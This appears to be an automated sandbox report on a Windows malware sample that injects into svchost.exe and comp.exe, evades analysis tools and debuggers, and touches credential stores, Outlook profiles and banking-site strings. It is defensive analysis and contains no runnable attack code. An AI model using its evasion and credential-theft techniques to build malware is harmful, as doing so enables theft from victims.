Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\comp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\comp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: EIvidclKOb.exe

Static file information: File size 1204224 > 1048576

Source: EIvidclKOb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: EIvidclKOb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: EIvidclKOb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: EIvidclKOb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: EIvidclKOb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: EIvidclKOb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: EIvidclKOb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: comp.pdb source: svchost.exe, 00000002.00000003.2449139398.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482750657.0000000003400000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000004.00000002.3960311147.0000000000838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HMKEBhehjTFHSE.exe, 00000004.00000002.3959727230.00000000000EE000.00000002.00000001.01000000.00000005.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3959730094.00000000000EE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: comp.pdbGCTL source: svchost.exe, 00000002.00000003.2449139398.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482750657.0000000003400000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000004.00000002.3960311147.0000000000838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: EIvidclKOb.exe, 00000000.00000003.2098547208.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, EIvidclKOb.exe, 00000000.00000003.2106907929.0000000004390000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482944957.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482944957.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2390348349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388242683.0000000003700000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000002.3961255868.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000005.00000003.2482648053.000000000088A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000003.2486501922.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000002.3961255868.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: EIvidclKOb.exe, 00000000.00000003.2098547208.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, EIvidclKOb.exe, 00000000.00000003.2106907929.0000000004390000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2482944957.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482944957.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2390348349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388242683.0000000003700000.00000004.00000020.00020000.00000000.sdmp, comp.exe, comp.exe, 00000005.00000002.3961255868.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000005.00000003.2482648053.000000000088A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000003.2486501922.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000002.3961255868.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: comp.exe, 00000005.00000002.3961674856.000000000332C000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000005.00000002.3959858179.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000000.2553970741.00000000034CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2786479701.000000003B34C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: comp.exe, 00000005.00000002.3961674856.000000000332C000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000005.00000002.3959858179.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000000.2553970741.00000000034CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2786479701.000000003B34C000.00000004.80000000.00040000.00000000.sdmp

Source: EIvidclKOb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: EIvidclKOb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: EIvidclKOb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: EIvidclKOb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: EIvidclKOb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F04B37 LoadLibraryA,GetProcAddress,

0_2_00F04B37

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F28945 push ecx; ret	0_2_00F28958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418B23 pushad ; ret	2_2_00418CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041183B push edi; iretd	2_2_0041183C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004180FB pushfd ; retf	2_2_00418116
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041222A push cs; retf	2_2_0041222F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004122B0 push ecx; retf	2_2_004122BD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004122BF pushfd ; iretd	2_2_004122C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403350 push eax; ret	2_2_00403352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C08 pushad ; ret	2_2_00418CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401552 pushfd ; ret	2_2_00401566
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408562 push edi; iretd	2_2_00408563
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408572 push esi; ret	2_2_00408573
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414503 push FFFFFFB7h; iretd	2_2_00414516
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004165F1 push eax; iretd	2_2_00416603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004015BB pushfd ; ret	2_2_00401566
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413E7E push ss; retf	2_2_00413E81
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408600 push ebp; iretd	2_2_00408601
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040175C pushfd ; ret	2_2_00401778
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418F7A push ecx; iretd	2_2_00418F81
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00424FC3 push edi; iretd	2_2_00424FCE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0225F pushad ; ret	2_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B027FA pushad ; ret	2_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx	2_2_03B309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0283D push eax; iretd	2_2_03B02858
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_03138947 push cs; retf	4_2_0313894C
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_031389DC pushfd ; iretd	4_2_031389DD
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_031389CD push ecx; retf	4_2_031389DA
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_0313E818 pushfd ; retf	4_2_0313E833
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_03137F58 push edi; iretd	4_2_03137F59
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_0313F697 push ecx; iretd	4_2_0313F69E
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_0314B6E0 push edi; iretd	4_2_0314B6EB

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00F048D7
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00F85376

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00F23187

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\EIvidclKOb.exe	API/Special instruction interceptor: Address: 1948BDC
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: EIvidclKOb.exe, 00000000.00000003.2089864403.0000000001981000.00000004.00000020.00020000.00000000.sdmp, EIvidclKOb.exe, 00000000.00000002.2111920374.0000000001981000.00000004.00000020.00020000.00000000.sdmp, EIvidclKOb.exe, 00000000.00000003.2089676588.0000000001928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: EIvidclKOb.exe, 00000000.00000003.2089864403.0000000001981000.00000004.00000020.00020000.00000000.sdmp, EIvidclKOb.exe, 00000000.00000002.2111920374.0000000001981000.00000004.00000020.00020000.00000000.sdmp, EIvidclKOb.exe, 00000000.00000003.2089676588.0000000001928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXEE

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03B7096E rdtsc

2_2_03B7096E

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105410

Source: C:\Users\user\Desktop\EIvidclKOb.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\comp.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\comp.exe TID: 6648	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe TID: 6648	Thread sleep time: -78000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe TID: 6568	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\comp.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\comp.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00F6445A
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6C6D1 FindFirstFileW,FindClose,	0_2_00F6C6D1
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00F6C75C
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F6EF95
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F6F0F2
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F6F3F3
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F637EF
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F63B12
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F6BCBC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001CC420 FindFirstFileW,FindNextFileW,FindClose,	5_2_001CC420

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F049A0

Source: 2-64-111.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 2-64-111.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 2-64-111.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 2-64-111.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 2-64-111.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 2-64-111.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 2-64-111.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 2-64-111.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 2-64-111.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 2-64-111.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 2-64-111.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 2-64-111.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: comp.exe, 00000005.00000002.3959858179.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3960543806.00000000015DF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2788018978.0000029EBB38E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 2-64-111.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 2-64-111.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 2-64-111.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 2-64-111.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 2-64-111.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 2-64-111.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 2-64-111.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 2-64-111.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 2-64-111.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 2-64-111.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 2-64-111.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\EIvidclKOb.exe

API call chain: ExitProcess graph end node

graph_0-104603

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03B7096E rdtsc

2_2_03B7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417743 LdrLoadDll,

2_2_00417743

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F73F09 BlockInput,

0_2_00F73F09

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F03B3A

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00F35A7C

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F04B37 LoadLibraryA,GetProcAddress,

0_2_00F04B37

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_01947808 mov eax, dword ptr fs:[00000030h]	0_2_01947808
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_01948EA8 mov eax, dword ptr fs:[00000030h]	0_2_01948EA8
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_01948E48 mov eax, dword ptr fs:[00000030h]	0_2_01948E48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]	2_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]	2_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]	2_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
